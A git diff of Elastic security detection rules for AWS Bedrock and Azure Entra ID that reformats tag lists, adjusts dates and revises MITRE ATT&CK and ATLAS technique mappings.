"2025/11/10" [rule] author = ["Elastic"] @@ -66,7 +66,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -98,15 +106,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_topic_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0069" -name = "Discover LLM System Information" -reference = "https://atlas.mitre.org/techniques/AML.T0069/" - -[rule.threat.tactic] -id = "AML.TA0008" -name = "Discovery" -reference = "https://atlas.mitre.org/tactics/AML.TA0008/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml index 19935aec2b5..360900d81b5 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_validation_exception_errors_by_single_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/11" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/07/16" [rule] author = ["Elastic"] @@ -67,7 +67,17 @@ This rule requires that AWS Bedrock Integration be configured. For more informat https://www.elastic.co/docs/current/integrations/aws_bedrock """ severity = "high" -tags = ["Domain: LLM", "Tactic: AI Model Access", "Data Source: AWS", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0015", "Mitre Atlas: T0034", "Mitre Atlas: T0046", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Use Case: Policy Violation", + "Mitre Atlas: T0015", + "Mitre Atlas: T0034", + "Mitre Atlas: T0046", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -105,15 +115,3 @@ from logs-aws_bedrock.invocation-* [rule.investigation_fields] field_names = ["target_time_window", "user.id", "cloud.account.id", "total_denials"] -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0040" -name = "AI Model Inference API Access" -reference = "https://atlas.mitre.org/techniques/AML.T0040/" - -[rule.threat.tactic] -id = "AML.TA0000" -name = "AI Model Access" -reference = "https://atlas.mitre.org/tactics/AML.TA0000/" diff --git a/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml b/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml index 3410cb1a594..e59b0217bfd 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_multiple_word_policy_blocks_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/20" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/10" [rule] author = ["Elastic"] @@ -66,7 +66,15 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = ["Domain: LLM", "Tactic: Discovery", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054", "Resources: Investigation Guide"] +tags = [ + "Domain: LLM", + "Data Source: AWS Bedrock", + "Data Source: AWS S3", + "Use Case: Policy Violation", + "Mitre Atlas: T0051", + "Mitre Atlas: T0054", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -98,20 +106,3 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_policy_blocked_profanity_count desc ''' -[[rule.threat]] -framework = "MITRE ATLAS" - -[[rule.threat.technique]] -id = "AML.T0084" -name = "Discover AI Agent Configuration" -reference = "https://atlas.mitre.org/techniques/AML.T0084/" - -[[rule.threat.technique]] -id = "AML.T0089" -name = "Process Discovery" -reference = "https://atlas.mitre.org/techniques/AML.T0089/" - -[rule.threat.tactic] -id = "AML.TA0008" -name = "Discovery" -reference = "https://atlas.mitre.org/tactics/AML.TA0008/" diff --git a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml index 93c5d59841a..aa6c1fdbe9e 100644 --- a/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml +++ b/rules/integrations/azure/collection_entra_id_sharepoint_access_from_unusual_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/01" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/12" [rule] author = ["Elastic"] @@ -119,21 +119,16 @@ event.dataset:azure.signinlogs [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1213" name = "Data from Information Repositories" reference = "https://attack.mitre.org/techniques/T1213/" - [[rule.threat.technique.subtechnique]] id = "T1213.002" name = "Sharepoint" reference = "https://attack.mitre.org/techniques/T1213/002/" -[[rule.threat.technique]] -id = "T1530" -name = "Data from Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1530/" + [rule.threat.tactic] id = "TA0009" @@ -142,21 +137,17 @@ reference = "https://attack.mitre.org/tactics/TA0009/" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.app_id", "azure.signinlogs.properties.tenant_id"] diff --git a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml index 6c94f0ef0c2..3f48cab4cf9 100644 --- a/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml +++ b/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/06" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] @@ -101,21 +101,17 @@ event.dataset:azure.graphactivitylogs [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" -[[rule.threat.technique.subtechnique]] -id = "T1114.002" -name = "Remote Email Collection" -reference = "https://attack.mitre.org/techniques/T1114/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml index 07c41f830ef..a94c27b574e 100644 --- a/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml +++ b/rules/integrations/azure/credential_access_azure_entra_susp_device_code_signin.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/02" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/21" [rule] author = ["Elastic"] @@ -110,13 +110,30 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml b/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml index 3e8f36dcffc..275eddfe849 100644 --- a/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml +++ b/rules/integrations/azure/credential_access_azure_storage_account_keys_accessed.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/23" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/23" [rule] author = ["Elastic"] @@ -96,13 +96,34 @@ value = "now-7d" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" +[[rule.threat.technique.subtechnique]] +id = "T1555.006" +name = "Cloud Secrets Management Stores" +reference = "https://attack.mitre.org/techniques/T1555/006/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" \ No newline at end of file diff --git a/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml b/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml index 1bbd401d0e9..a0016af7ce5 100644 --- a/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml +++ b/rules/integrations/azure/credential_access_entra_id_excessive_account_lockouts.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "Changing min stack to 9.1.0, the latest minimum supported version for 9.X releases." min_stack_version = "9.1.0" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -107,21 +107,32 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" - [[rule.threat.technique.subtechnique]] id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.004" +name = "Credential Stuffing" +reference = "https://attack.mitre.org/techniques/T1110/004/" + + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.threshold] field = [] value = 30 diff --git a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml index bf8c794d9eb..b1e86ae2c14 100644 --- a/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml +++ b/rules/integrations/azure/credential_access_entra_id_suspicious_signin.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/28" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -54,7 +54,17 @@ setup = """#### Required Azure Entra Sign-In Logs This rule requires the Azure logs integration be enabled and configured to collect all logs, including sign-in logs from Entra. In Entra, sign-in logs must be enabled and streaming to the Event Hub used for the Azure logs integration. """ severity = "high" -tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Credential Access", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: SaaS", + "Data Source: Azure", + "Data Source: Entra ID", + "Data Source: Entra ID Sign-in", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -125,31 +135,30 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + [rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml b/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml index b4936e24a57..a4e8626eee9 100644 --- a/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml +++ b/rules/integrations/azure/credential_access_entra_id_totp_brute_force_attempts.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/11" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -161,13 +161,19 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml index 4b240b4a0cf..b1b7021a706 100644 --- a/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml +++ b/rules/integrations/azure/credential_access_key_vault_excessive_retrieval.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/10" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -70,7 +70,18 @@ To ensure this rule functions correctly, the following diagnostic logs must be e - AuditEvent: This log captures all read and write operations performed on the Key Vault, including secret, key, and certificate retrievals. These logs should be streamed to the Event Hub used for the Azure integration configuration. """ severity = "medium" -tags = ["Domain: Cloud", "Domain: Storage", "Domain: Identity", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Azure", "Data Source: Azure Platform Logs", "Data Source: Azure Key Vault", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Domain: Storage", + "Domain: Identity", + "Data Source: Azure", + "Data Source: Azure Platform Logs", + "Data Source: Azure Key Vault", + "Use Case: Threat Detection", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "esql" @@ -164,31 +175,19 @@ by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1213" -name = "Data from Information Repositories" -reference = "https://attack.mitre.org/techniques/T1213/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [[rule.threat.technique.subtechnique]] id = "T1555.006" name = "Cloud Secrets Management Stores" reference = "https://attack.mitre.org/techniques/T1555/006/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml index 6bad05244fd..8a88cceeb2f 100644 --- a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml +++ b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/19" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/30" [rule] author = ["Elastic"] @@ -67,7 +67,13 @@ references = [ risk_score = 21 rule_id = "1e0b832e-957e-43ae-b319-db82d228c908" severity = "low" -tags = ["Domain: Cloud", "Tactic: Persistence", "Data Source: Azure", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Use Case: Identity and Access Audit", + "Tactic: Credential Access", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -78,18 +84,34 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" +[[rule.threat.technique.subtechnique]] +id = "T1552.005" +name = "Cloud Instance Metadata API" +reference = "https://attack.mitre.org/techniques/T1552/005/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml index 663788378b1..d9817465e01 100644 --- a/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml +++ b/rules/integrations/azure/defense_evasion_automation_runbook_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -62,7 +62,7 @@ references = [ risk_score = 21 rule_id = "8ddab73b-3d15-4e5d-9413-47f05553c1d7" severity = "low" -tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Impact", "Data Source: Azure", "Use Case: Configuration Audit", "Resources: Investigation Guide"] +tags = ["Domain: Cloud", "Data Source: Azure", "Use Case: Configuration Audit", "Tactic: Defense Evasion", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -76,25 +76,8 @@ event.dataset:azure.activitylogs and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1485" -name = "Data Destruction" -reference = "https://attack.mitre.org/techniques/T1485/" - -[rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" diff --git a/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml b/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml index aec440c0508..7f1c35aedb6 100644 --- a/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml +++ b/rules/integrations/azure/defense_evasion_insights_diagnostic_settings_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -84,21 +84,27 @@ event.dataset:azure.activitylogs [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [[rule.threat.technique.subtechnique]] id = "T1562.008" name = "Disable or Modify Cloud Logs" reference = "https://attack.mitre.org/techniques/T1562/008/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml index 4e60e6ae26d..76a3d0239cb 100644 --- a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml +++ b/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml @@ -2,7 +2,7 @@ creation_date = "2021/06/24" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Austin Songer"] @@ -80,13 +80,19 @@ event.outcome:(Success or success) [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1070" -name = "Indicator Removal" -reference = "https://attack.mitre.org/techniques/T1070/" +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml index 9c69e71409e..0acbfc2f754 100644 --- a/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml +++ b/rules/integrations/azure/defense_evasion_network_watcher_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/31" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -81,23 +81,19 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" - [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml index 8ef3beefa07..5421c5675f8 100644 --- a/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml +++ b/rules/integrations/azure/defense_evasion_security_alert_suppression_rule_created.toml @@ -2,7 +2,7 @@ creation_date = "2021/08/27" integration = ["azure"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Austin Songer"] @@ -81,18 +81,14 @@ event.outcome: "success" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml b/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml index a537e8045fc..dcdc2b1b80e 100644 --- a/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml +++ b/rules/integrations/azure/discovery_bloodhound_user_agents_detected.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/03" integration = ["azure", "o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -118,27 +118,36 @@ any where event.dataset : ( [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique.subtechnique]] id = "T1069.003" name = "Cloud Groups" reference = "https://attack.mitre.org/techniques/T1069/003/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1087/004/" + +[[rule.threat.technique]] +id = "T1201" +name = "Password Policy Discovery" +reference = "https://attack.mitre.org/techniques/T1201/" + [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" @@ -149,7 +158,14 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" +[[rule.threat.technique]] +id = "T1673" +name = "Virtual Machine Discovery" +reference = "https://attack.mitre.org/techniques/T1673/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml index 34fc96dc32c..d8c4b0c0ae9 100644 --- a/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml +++ b/rules/integrations/azure/discovery_entra_id_teamfiltration_user_agents_detected.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/02" integration = ["azure", "o365"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/10" [rule] author = ["Elastic"] @@ -79,7 +79,18 @@ references = [ risk_score = 47 rule_id = "f541ca3a-5752-11f0-b44b-f661ea17fbcd" severity = "medium" -tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Azure", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] +tags = [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Microsoft 365", + "Data Source: Microsoft 365 Audit Logs", + "Data Source: Microsoft Entra ID", + "Data Source: Microsoft Entra ID Sign-in Logs", + "Use Case: Identity and Access Audit", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "query" @@ -92,46 +103,71 @@ event.dataset:("azure.signinlogs" or "o365.audit") [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique.subtechnique]] id = "T1069.003" name = "Cloud Groups" reference = "https://attack.mitre.org/techniques/T1069/003/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.004" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1087/004/" + +[[rule.threat.technique]] +id = "T1201" +name = "Password Policy Discovery" +reference = "https://attack.mitre.org/techniques/T1201/" + +[[rule.threat.technique]] +id = "T1526" +name = "Cloud Service Discovery" +reference = "https://attack.mitre.org/techniques/T1526/" + +[[rule.threat.technique]] +id = "T1580" +name = "Cloud Infrastructure Discovery" +reference = "https://attack.mitre.org/techniques/T1580/" + +[[rule.threat.technique]] +id = "T1673" +name = "Virtual Machine Discovery" +reference = "https://attack.mitre.org/techniques/T1673/" + + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" 